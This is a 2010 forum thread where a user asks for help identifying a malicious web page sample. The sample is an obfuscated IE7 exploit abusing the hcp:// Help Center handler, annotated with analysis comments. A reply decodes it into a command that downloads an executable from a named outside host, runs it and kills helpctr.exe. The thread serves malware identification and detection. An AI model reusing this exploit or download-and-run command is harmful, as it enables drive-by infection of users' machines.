Author Topic: Malware?  (Read 4336 times)


June 24, 2010, 08:28:28 am

y0liny

Help needed.
What is this? Can anyone decode this malware?
        <html>
                 
                     <body>


// Gate: only runs when the browser reports itself as IE7 (document.all present and
// 'MSIE 7.' in navigator.appVersion). Analysis with any other user-agent string does
// not reach this code path, which is worth remembering when replaying the sample.
if((document.all)&&(navigator.appVersion.indexOf('MSIE 7.')!=-1))
{
try {
rewui321();
}
catch(ex){
// Retry path: presumably covers the case where document.body does not exist yet
// (the appendChild below would throw); it writes a <body> and retries after 100 ms.
document.write('<body>'); setTimeout(function(){rewui321()}, 100);
}

// Appends an <iframe> whose src is an hcp:// (Windows Help Center) URL.
// The svr= parameter is URL-encoded several times; reply #2 below shows the decoded
// command, which downloads an executable into %TEMP%, runs it, and then force-kills
// helpctr.exe. For detection: the hcp:// URL with the long run of "%A%" padding and
// the download host in the decoded command are the indicators visible in this sample.
function rewui321(){
var o=document.createElement('iframe');
o.src="hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape%28%27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd%2B%252Fc%2Bcd%2B..%252F%2526echo%2Bnew%2BFunction%2528ac%2528U%253B%25290%252Cf%2528nuR.s%253B%25292%252Cf%2528eliFoTevaS.o%253B%2529ydoBesnopser.x%2528etirW.o%253B%2529%2528nepO.o%253B1JepyT.o%253B3JedoM.o%253B%2529%2528dnes.x%253B%25290%252C%254001Jdip%25261Jdi%253Fphp.emoclew%252F0808%253Amoc.yrellagratseigna.yfossa%252F%252F%253Aptth%2540%252C%2540TEG%2540%2528nepo.x%253B%2540exe.0%252F%2540%252B%2529%2540PMET%2540%2528metI.%2529%2540ssecorP%2540%2528tnemnorivnE.sJf%253B%2529%2540PTTHLMX.tfosorciM%2540%2528a%2BwenJx%253B%2529%2540maertS.BDODA%2540%2528a%2BwenJo%253B%2529%2540llehS.tpircSW%2540%2528a%2BwenJs%253BtcejbOXevitcA%2BJ%2BaU%2529%2529%2528%2529%253Bfunction%2Bac%2528bc%2529%257BrJUU%253Bfor%2528iJbc.length%253Bi%253EJ0%253Bi--%2529r%252BJbc.substr%2528i%252C1%252C1%2529%253Breturn%2Br%257D%2B%253E.js%257Ccscript%2B.js%2526del%2B%252Fq%2B.js%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelpctr.exe%2522.replace%2528%252F%2540%252Fg%252CString.fromCharCode%252834%2529%2529.replace%2528%252FJ%252Fg%252CString.fromCharCode%252861%2529%2529.replace%2528%252FU%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2Fscript%3E";
document.body.appendChild(o);
}                       
}
</body>
</html>

ROD, BLESS!

June 24, 2010, 11:10:10 am
Reply #1

Garlando


June 24, 2010, 02:23:32 pm
Reply #2

philipp

Relevant part (the decoded command from the svr= parameter), more readable:
cmd /c cd ../&echo a = ActiveXObject;s=new a("WScript.Shell");o=new a("ADODB.Stream");x=new a("Microsoft.XMLHTTP");f=s.Environment("Process").Item("TEMP")+"/0.exe";x.open("GET","http://assofy.angiestargallery.com:8080/welcome.php?id=1&pid=10",0);x.send();o.Mode=3;o.Type=1;o.Open();o.Write(x.responseBody);o.SaveToFile(f,2);s.Run(f,0); >.js|cscript .js&del /q .js|taskkill /F /IM helpctr.exe 0 1